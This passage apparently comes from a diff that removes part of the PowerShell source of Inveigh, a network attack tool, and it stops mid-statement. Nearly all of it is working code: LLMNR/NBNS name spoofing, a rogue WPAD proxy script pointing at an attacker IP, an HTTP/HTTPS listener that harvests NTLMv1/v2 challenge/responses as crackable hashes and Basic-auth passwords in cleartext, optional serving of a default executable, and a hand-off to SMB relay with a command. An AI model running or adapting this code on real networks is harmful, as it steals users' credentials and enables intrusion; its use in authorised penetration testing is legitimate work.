-$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh started")]) > $null -$inveigh.status_queue.Add("Listening IP Address = $IP") > $null -$inveigh.status_queue.Add("LLMNR/NBNS Spoofer IP Address = $SpooferIP") > $null - -if($LLMNR -eq 'Y') -{ - $inveigh.status_queue.Add("LLMNR Spoofing Enabled") > $null - $inveigh.status_queue.Add("LLMNR TTL = $LLMNRTTL Seconds") > $null - $LLMNR_response_message = "- spoofed response has been sent" -} -else -{ - $inveigh.status_queue.Add("LLMNR Spoofing Disabled") > $null - $LLMNR_response_message = "- LLMNR spoofing is disabled" -} - -if($NBNS -eq 'Y') -{ - $NBNSTypes_output = $NBNSTypes -join "," - - if($NBNSTypes.Count -eq 1) - { - $inveigh.status_queue.Add("NBNS Spoofing Of Type $NBNSTypes_output Enabled") > $null - } - else - { - $inveigh.status_queue.Add("NBNS Spoofing Of Types $NBNSTypes_output Enabled") > $null - } - - $inveigh.status_queue.Add("NBNS TTL = $NBNSTTL Seconds") > $null - $NBNS_response_message = "- spoofed response has been sent" -} -else -{ - $inveigh.status_queue.Add("NBNS Spoofing Disabled") > $null - $NBNS_response_message = "- NBNS spoofing is disabled" -} - -if($SpooferHostsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) -{ - $inveigh.status_queue.Add("Spoofing requests for " + $SpooferHostsReply -join ",") > $null -} - -if($SpooferHostsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) -{ - $inveigh.status_queue.Add("Ignoring requests for " + $SpooferHostsIgnore -join ",") > $null -} - -if($SpooferIPsReply -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) -{ - $inveigh.status_queue.Add("Spoofing requests from " + $SpooferIPsReply -join ",") > $null -} - -if($SpooferIPsIgnore -and ($LLMNR -eq 'Y' -or $NBNS -eq 'Y')) -{ - $inveigh.status_queue.Add("Ignoring requests from " + $SpooferIPsIgnore -join ",") > $null -} - -if($SpooferRepeat -eq 'N') -{ - $inveigh.spoofer_repeat = $false - $inveigh.status_queue.Add("Spoofer Repeating Disabled") > $null -} -else -{ - $inveigh.spoofer_repeat = $true -} - -if($SMB -eq 'Y') -{ - $inveigh.status_queue.Add("SMB Capture Enabled") > $null -} -else -{ - $inveigh.status_queue.Add("SMB Capture Disabled") > $null -} - -if($HTTP -eq 'Y') -{ - $inveigh.HTTP = $true - $inveigh.status_queue.Add("HTTP Capture Enabled") > $null -} -else -{ - $inveigh.HTTP = $false - $inveigh.status_queue.Add("HTTP Capture Disabled") > $null -} - -if($HTTPS -eq 'Y') -{ - - try - { - $inveigh.HTTPS = $true - $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine") - $certificate_store.Open('ReadWrite') - $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 - $certificate.Import($PWD.Path + "\Inveigh.pfx") - $certificate_store.Add($certificate) - $certificate_store.Close() - $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint - $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}" - $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID) - & "netsh" $netsh_arguments > $null - $inveigh.status_queue.Add("HTTPS Capture Enabled") > $null - } - catch - { - $certificate_store.Close() - $HTTPS="N" - $inveigh.HTTPS = $false - $inveigh.status_queue.Add("HTTPS Capture Disabled Due To Certificate Install Error") > $null - } - -} -else -{ - $inveigh.status_queue.Add("HTTPS Capture Disabled") > $null -} - -if($inveigh.HTTP -or $inveigh.HTTPS) -{ - $inveigh.status_queue.Add("HTTP/HTTPS Authentication = $HTTPAuth") > $null - $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null - - if($HTTPDir -and !$HTTPResponse) - { - $inveigh.status_queue.Add("HTTP/HTTPS Directory = $HTTPDir") > $null - - if($HTTPDefaultFile) - { - $inveigh.status_queue.Add("HTTP/HTTPS Default Response File = $HTTPDefaultFile") > $null - } - - if($HTTPDefaultEXE) - { - $inveigh.status_queue.Add("HTTP/HTTPS Default Response Executable = $HTTPDefaultEXE") > $null - } - - } - - if($HTTPResponse) - { - $inveigh.status_queue.Add("HTTP/HTTPS Custom Response Enabled") > $null - } - - if($HTTPAuth -eq 'Basic' -or $WPADAuth -eq 'Basic') - { - $inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null - } - - if($WPADIP -and $WPADPort) - { - $inveigh.status_queue.Add("WPAD Response Enabled") > $null - $inveigh.status_queue.Add("WPAD = $WPADIP`:$WPADPort") > $null - - if($WPADDirectHosts) - { - ForEach($WPAD_direct_host in $WPADDirectHosts) - { - $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";' - } - - $inveigh.WPAD_response = "function FindProxyForURL(url,host){" + $WPAD_direct_hosts_function + "return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" - $inveigh.status_queue.Add("WPAD Direct Hosts = " + $WPADDirectHosts -join ",") > $null - } - else - { - $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"PROXY " + $WPADIP + ":" + $WPADPort + "`";}" - } - - } - elseif($WPADResponse -and !$WPADIP -and !$WPADPort) - { - $inveigh.status_queue.Add("WPAD Custom Response Enabled") > $null - $inveigh.WPAD_response = $WPADResponse - } - else - { - if($WPADEmptyFile -eq 'Y') - { - $inveigh.status_queue.Add("WPAD Default Response Enabled") > $null - $inveigh.WPAD_response = "function FindProxyForURL(url,host){return `"DIRECT`";}" - } - } - - if($Challenge) - { - $inveigh.status_queue.Add("NTLM Challenge = $Challenge") > $null - } - -} - -if($MachineAccounts -eq 'N') -{ - $inveigh.status_queue.Add("Ignoring Machine Accounts") > $null - $inveigh.machine_accounts = $false -} -else -{ - $inveigh.machine_accounts = $true -} - -if($ConsoleOutput -eq 'Y') -{ - $inveigh.status_queue.Add("Real Time Console Output Enabled") > $null - $inveigh.console_output = $true - - if($ConsoleStatus -eq 1) - { - $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minute") > $null - } - elseif($ConsoleStatus -gt 1) - { - $inveigh.status_queue.Add("Console Status = $ConsoleStatus Minutes") > $null - } - -} -else -{ - - if($inveigh.tool -eq 1) - { - $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null - } - else - { - $inveigh.status_queue.Add("Real Time Console Output Disabled") > $null - } - -} - -if($ConsoleUnique -eq 'Y') -{ - $inveigh.console_unique = $true -} -else -{ - $inveigh.console_unique = $false -} - -if($FileOutput -eq 'Y') -{ - $inveigh.status_queue.Add("Real Time File Output Enabled") > $null - $inveigh.status_queue.Add("Output Directory = $output_directory") > $null - $inveigh.file_output = $true -} -else -{ - $inveigh.status_queue.Add("Real Time File Output Disabled") > $null -} - -if($FileUnique -eq 'Y') -{ - $inveigh.file_unique = $true -} -else -{ - $inveigh.file_unique = $false -} - -if($RunTime -eq 1) -{ - $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null -} -elseif($RunTime -gt 1) -{ - $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null -} - -if($SMBRelay -eq 'N') -{ - - if($ShowHelp -eq 'Y') - { - $inveigh.status_queue.Add("Use Get-Command -Noun Inveigh* to show available functions") > $null - $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh") > $null - - if($inveigh.console_output) - { - $inveigh.status_queue.Add("Press any key to stop real time console output") > $null - } - - } - - if($inveigh.status_output) - { - - while($inveigh.status_queue.Count -gt 0) - { - - if($inveigh.output_stream_only) - { - Write-Output($inveigh.status_queue[0] + $inveigh.newline) - $inveigh.status_queue.RemoveRange(0,1) - } - else - { - - switch ($inveigh.status_queue[0]) - { - - "Run Stop-Inveigh to stop Inveigh" - { - Write-Warning($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - default - { - Write-Output($inveigh.status_queue[0]) - $inveigh.status_queue.RemoveRange(0,1) - } - - } - - } - - } - - } -} -else -{ - try - { - Invoke-InveighRelay -HTTP $HTTP -HTTPS $HTTPS -HTTPSCertAppID $HTTPSCertAppID -HTTPSCertThumbprint $HTTPSCertThumbprint -WPADAuth $WPADAuth -SMBRelayTarget $SMBRelayTarget -SMBRelayUsernames $SMBRelayUsernames -SMBRelayAutoDisable $SMBRelayAutoDisable -SMBRelayNetworkTimeout $SMBRelayNetworkTimeout -SMBRelayCommand $SMBRelayCommand -Tool $Tool -ShowHelp $ShowHelp - } - catch - { - $inveigh.running = $false - throw "Invoke-InveighRelay is not loaded" - } -} - -# Begin ScriptBlocks - -# Shared Basic Functions ScriptBlock -$shared_basic_functions_scriptblock = -{ - function DataToUInt16($field) - { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt16($field,0) - } - - function DataToUInt32($field) - { - [Array]::Reverse($field) - return [System.BitConverter]::ToUInt32($field,0) - } - - function DataLength - { - param ([Int]$length_start,[Byte[]]$string_extract_data) - - $string_length = [System.BitConverter]::ToInt16($string_extract_data[$length_start..($length_start + 1)],0) - return $string_length - } - - function DataToString - { - param ([Int]$string_length,[Int]$string2_length,[Int]$string3_length,[Int]$string_start,[Byte[]]$string_extract_data) - - $string_data = [System.BitConverter]::ToString($string_extract_data[($string_start+$string2_length+$string3_length)..($string_start+$string_length+$string2_length+$string3_length - 1)]) - $string_data = $string_data -replace "-00","" - $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - $string_extract = New-Object System.String ($string_data,0,$string_data.Length) - return $string_extract - } -} - -# SMB NTLM Functions ScriptBlock - function for parsing NTLM challenge/response -$SMB_NTLM_functions_scriptblock = -{ - - function SMBNTLMChallenge - { - param ([Byte[]]$payload_bytes) - - $payload = [System.BitConverter]::ToString($payload_bytes) - $payload = $payload -replace "-","" - $NTLM_index = $payload.IndexOf("4E544C4D53535000") - - if($payload.SubString(($NTLM_index + 16),8) -eq "02000000") - { - $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16) - } - - return $NTLM_challenge - } - - function SMBNTLMResponse - { - param ([Byte[]]$payload_bytes) - - $payload = [System.BitConverter]::ToString($payload_bytes) - $payload = $payload -replace "-","" - $NTLM_index = $payload.IndexOf("4E544C4D53535000") - $NTLM_bytes_index = $NTLM_index / 2 - - if($payload.SubString(($NTLM_index + 16),8) -eq "03000000") - { - $LM_length = DataLength ($NTLM_bytes_index + 12) $payload_bytes - $LM_offset = $payload_bytes[($NTLM_bytes_index + 16)] - - if($LM_length -ge 24) - { - $NTLM_length = DataLength ($NTLM_bytes_index + 20) $payload_bytes - $NTLM_offset = $payload_bytes[($NTLM_bytes_index + 24)] - $NTLM_domain_length = DataLength ($NTLM_bytes_index + 28) $payload_bytes - $NTLM_domain_offset = DataLength ($NTLM_bytes_index + 32) $payload_bytes - $NTLM_domain_string = DataToString $NTLM_domain_length 0 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes - $NTLM_user_length = DataLength ($NTLM_bytes_index + 36) $payload_bytes - $NTLM_user_string = DataToString $NTLM_user_length $NTLM_domain_length 0 ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes - $NTLM_host_length = DataLength ($NTLM_bytes_index + 44) $payload_bytes - $NTLM_host_string = DataToString $NTLM_host_length $NTLM_user_length $NTLM_domain_length ($NTLM_bytes_index + $NTLM_domain_offset) $payload_bytes - - if(([System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $LM_length - 1)]) -replace "-","") -eq ("00" * $LM_length)) - { - $NTLMv2_response = [System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $NTLM_offset)..($NTLM_bytes_index + $NTLM_offset + $NTLM_length - 1)]) -replace "-","" - $NTLMv2_response = $NTLMv2_response.Insert(32,':') - $NTLMv2_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLMv2_response - - if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) - $inveigh.NTLMv2_list.Add($NTLMv2_hash) - - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv2_hash") - } - else - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv2 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique") - } - - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) - { - $inveigh.NTLMv2_file_queue.Add($NTLMv2_hash) - $inveigh.console_queue.Add("SMB NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) - } - - if($inveigh.NTLMv2_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string") - { - $inveigh.NTLMv2_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") - } - - } - - } - else - { - $NTLMv1_response = [System.BitConverter]::ToString($payload_bytes[($NTLM_bytes_index + $LM_offset)..($NTLM_bytes_index + $LM_offset + $NTLM_length + $LM_length - 1)]) -replace "-","" - $NTLMv1_response = $NTLMv1_response.Insert(48,':') - $NTLMv1_hash = $NTLM_user_string + "::" + $NTLM_domain_string + ":" + $NTLMv1_response + ":" + $NTLM_challenge - - if($source_IP -ne $IP -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response for $NTLM_domain_string\$NTLM_user_string captured from $source_IP($NTLM_host_string)")]) - $inveigh.NTLMv1_list.Add($NTLMv1_hash) - - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string")) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string):`n$NTLMv1_hash") - } - else - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - SMB NTLMv1 challenge/response captured from $source_IP($NTLM_host_string) for $NTLM_domain_string\$NTLM_user_string - not unique") - } - - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string"))) - { - $inveigh.NTLMv1_file_queue.Add($NTLMv1_hash) - $inveigh.console_queue.Add("SMB NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) - } - - if($inveigh.NTLMv1_username_list -notcontains "$source_IP $NTLM_domain_string\$NTLM_user_string") - { - $inveigh.NTLMv1_username_list.Add("$source_IP $NTLM_domain_string\$NTLM_user_string") - } - - } - - } - - if ($inveigh.IP_capture_list -notcontains $source_IP -and -not $NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat -and $source_IP -ne $IP) - { - $inveigh.IP_capture_list.Add($source_IP.IPAddressToString) - } - - } - - } - - } - -} - -# HTTP/HTTPS Server ScriptBlock - HTTP/HTTPS listener -$HTTP_scriptblock = -{ - param ($HTTPAuth,$HTTPBasicRealm,$WPADAuth) - - function NTLMChallengeBase64 - { - - $HTTP_timestamp = Get-Date - $HTTP_timestamp = $HTTP_timestamp.ToFileTime() - $HTTP_timestamp = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_timestamp)) - $HTTP_timestamp = $HTTP_timestamp.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - - if($inveigh.challenge) - { - $HTTP_challenge = $inveigh.challenge - $HTTP_challenge_bytes = $inveigh.challenge.Insert(2,'-').Insert(5,'-').Insert(8,'-').Insert(11,'-').Insert(14,'-').Insert(17,'-').Insert(20,'-') - $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - } - else - { - $HTTP_challenge_bytes = [String](1..8 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)}) - $HTTP_challenge = $HTTP_challenge_bytes -replace ' ','' - $HTTP_challenge_bytes = $HTTP_challenge_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)} - } - - $inveigh.HTTP_challenge_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + ',' + $HTTP_challenge) > $null - - $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00,0x06,0x00,0x06,0x00,0x38, - 0x00,0x00,0x00,0x05,0x82,0x89,0xa + - $HTTP_challenge_bytes + - 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x82,0x00,0x82,0x00,0x3e,0x00,0x00,0x00,0x06, - 0x01,0xb1,0x1d,0x00,0x00,0x00,0x0f,0x4c,0x00,0x41,0x00,0x42,0x00,0x02,0x00,0x06,0x00, - 0x4c,0x00,0x41,0x00,0x42,0x00,0x01,0x00,0x10,0x00,0x48,0x00,0x4f,0x00,0x53,0x00,0x54, - 0x00,0x4e,0x00,0x41,0x00,0x4d,0x00,0x45,0x00,0x04,0x00,0x12,0x00,0x6c,0x00,0x61,0x00, - 0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x03,0x00,0x24, - 0x00,0x68,0x00,0x6f,0x00,0x73,0x00,0x74,0x00,0x6e,0x00,0x61,0x00,0x6d,0x00,0x65,0x00, - 0x2e,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00,0x6f,0x00,0x63,0x00,0x61, - 0x00,0x6c,0x00,0x05,0x00,0x12,0x00,0x6c,0x00,0x61,0x00,0x62,0x00,0x2e,0x00,0x6c,0x00, - 0x6f,0x00,0x63,0x00,0x61,0x00,0x6c,0x00,0x07,0x00,0x08,0x00 + - $HTTP_timestamp + - 0x00,0x00,0x00,0x00,0x0a,0x0a - - $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes) - $NTLM = 'NTLM ' + $NTLM_challenge_base64 - $NTLM_challenge = $HTTP_challenge - - return $NTLM - } - - $HTTP_raw_url_output = $true - - while($inveigh.running) - { - $inveigh.context = $inveigh.HTTP_listener.GetContext() - $inveigh.request = $inveigh.context.Request - $inveigh.response = $inveigh.context.Response - $NTLM = 'NTLM' - $NTLM_auth = $false - $Basic_auth = $false - - if($inveigh.request.IsSecureConnection) - { - $HTTP_type = "HTTPS" - } - else - { - $HTTP_type = "HTTP" - } - - if($inveigh.request.RawUrl -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') - { - $inveigh.response.StatusCode = 200 - } - else - { - $inveigh.response.StatusCode = 401 - } - - $HTTP_request_time = Get-Date -format 's' - - if($HTTP_request_time -eq $HTTP_request_time_old -and $inveigh.request.RawUrl -eq $HTTP_request_raw_url_old -and $inveigh.request.RemoteEndpoint.Address -eq $HTTP_request_remote_endpoint_old) - { - $HTTP_raw_url_output = $false - } - else - { - $HTTP_raw_url_output = $true - } - - if(!$inveigh.request.headers["Authorization"] -and $inveigh.HTTP_listener.IsListening -and $HTTP_raw_url_output) - { - $inveigh.console_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$HTTP_request_time - $HTTP_type request for " + $inveigh.request.RawUrl + " received from " + $inveigh.request.RemoteEndpoint.Address)]) - } - - $HTTP_request_raw_url_old = $inveigh.request.RawUrl - $HTTP_request_remote_endpoint_old = $inveigh.request.RemoteEndpoint.Address - $HTTP_request_time_old = $HTTP_request_time - - [String] $authentication_header = $inveigh.request.headers.GetValues('Authorization') - - if($authentication_header.StartsWith('NTLM ')) - { - $authentication_header = $authentication_header -replace 'NTLM ','' - [Byte[]] $HTTP_request_bytes = [System.Convert]::FromBase64String($authentication_header) - $inveigh.response.StatusCode = 401 - - if($HTTP_request_bytes[8] -eq 1) - { - $inveigh.response.StatusCode = 401 - $NTLM = NTLMChallengeBase64 - } - elseif($HTTP_request_bytes[8] -eq 3) - { - $NTLM = 'NTLM' - $HTTP_NTLM_offset = $HTTP_request_bytes[24] - $HTTP_NTLM_length = DataLength 22 $HTTP_request_bytes - $HTTP_NTLM_domain_length = DataLength 28 $HTTP_request_bytes - $HTTP_NTLM_domain_offset = DataLength 32 $HTTP_request_bytes - [String] $NTLM_challenge = $inveigh.HTTP_challenge_queue -like $inveigh.request.RemoteEndpoint.Address.IPAddressToString + $inveigh.request.RemoteEndpoint.Port + '*' - $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge) - $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1) - - if($HTTP_NTLM_domain_length -eq 0) - { - $HTTP_NTLM_domain_string = '' - } - else - { - $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_length 0 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - } - - $HTTP_NTLM_user_length = DataLength 36 $HTTP_request_bytes - $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_length $HTTP_NTLM_domain_length 0 $HTTP_NTLM_domain_offset $HTTP_request_bytes - $HTTP_NTLM_host_length = DataLength 44 $HTTP_request_bytes - $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_length $HTTP_NTLM_domain_length $HTTP_NTLM_user_length $HTTP_NTLM_domain_offset $HTTP_request_bytes - - if($HTTP_NTLM_length -eq 24) # NTLMv1 - { - $NTLM_type = "NTLMv1" - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(48,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge - - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) - $inveigh.NTLMv1_list.Add($inveigh.HTTP_NTLM_hash) - - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) - { - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) - } - else - { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv1 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") - } - - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) - { - $inveigh.NTLMv1_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add("$HTTP_type NTLMv1 challenge/response written to " + $inveigh.NTLMv1_out_file) - } - - if($inveigh.NTLMv1_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) - { - $inveigh.NTLMv1_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") - } - - } - - } - else # NTLMv2 - { - $NTLM_type = "NTLMv2" - $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-","" - $NTLM_response = $NTLM_response.Insert(32,':') - $inveigh.HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response - - if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))) - { - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ")")]) - $inveigh.NTLMv2_list.Add($inveigh.HTTP_NTLM_hash) - - if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))) - { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + "):`n" + $inveigh.HTTP_NTLM_hash) - } - else - { - $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from " + $inveigh.request.RemoteEndpoint.Address + "(" + $HTTP_NTLM_host_string + ") for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique") - } - - if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))) - { - $inveigh.NTLMv2_file_queue.Add($inveigh.HTTP_NTLM_hash) - $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file) - } - - if($inveigh.NTLMv2_username_list -notcontains ($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")) - { - $inveigh.NTLMv2_username_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + " $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string") - } - - } - - } - - if($inveigh.IP_capture_list -notcontains $inveigh.request.RemoteEndpoint.Address.IPAddressToString -and -not $HTTP_NTLM_user_string.EndsWith('$') -and !$inveigh.spoofer_repeat) - { - $inveigh.IP_capture_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString) - } - - $inveigh.response.StatusCode = 200 - $NTLM_auth = $true - $NTLM_challenge = '' - $HTTP_raw_url_output = $true - - } - else - { - $NTLM = 'NTLM' - } - - } - elseif($authentication_header.StartsWith('Basic ')) # Thanks to @xorrior for the initial basic auth code - { - $inveigh.response.StatusCode = 200 - $Basic_auth = $true - $authentication_header = $authentication_header -replace 'Basic ','' - $cleartext_credentials = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($authentication_header)) - $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Basic auth cleartext credentials captured from " + $inveigh.request.RemoteEndpoint.Address)]) - $inveigh.cleartext_file_queue.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") - $inveigh.cleartext_list.Add($inveigh.request.RemoteEndpoint.Address.IPAddressToString + ",$HTTP_type,$cleartext_credentials") - $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type Basic auth cleartext credentials $cleartext_credentials captured from " + $inveigh.request.RemoteEndpoint.Address) - - if($inveigh.file_output) - { - $inveigh.console_queue.Add("$HTTP_type Basic auth cleartext credentials written to " + $inveigh.cleartext_out_file) - } - - } - - if(($HTTPAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -notmatch '/wpad.dat') -or ($WPADAuth -eq 'Anonymous' -and $inveigh.request.RawUrl -match '/wpad.dat') -or $NTLM_Auth -or $Basic_auth) - { - - if($inveigh.HTTP_directory -and $inveigh.HTTP_default_EXE -and $inveigh.request.RawUrl -like '*.exe' -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl))) - { - [Byte[]] $HTTP_buffer = [System.IO.File]::ReadAllBytes((Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_EXE)) - } - elseif($inveigh.HTTP_directory) - { - - if($inveigh.HTTP_default_file -and !(Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.request.RawUrl)) -and (Test-Path (Join-Path $inveigh.HTTP_directory $inveigh.HTTP_default_file)) -and $inveigh.request.RawUrl -notmatch '/wpad.dat') - { - [Byte[]] $HTTP_buffer = 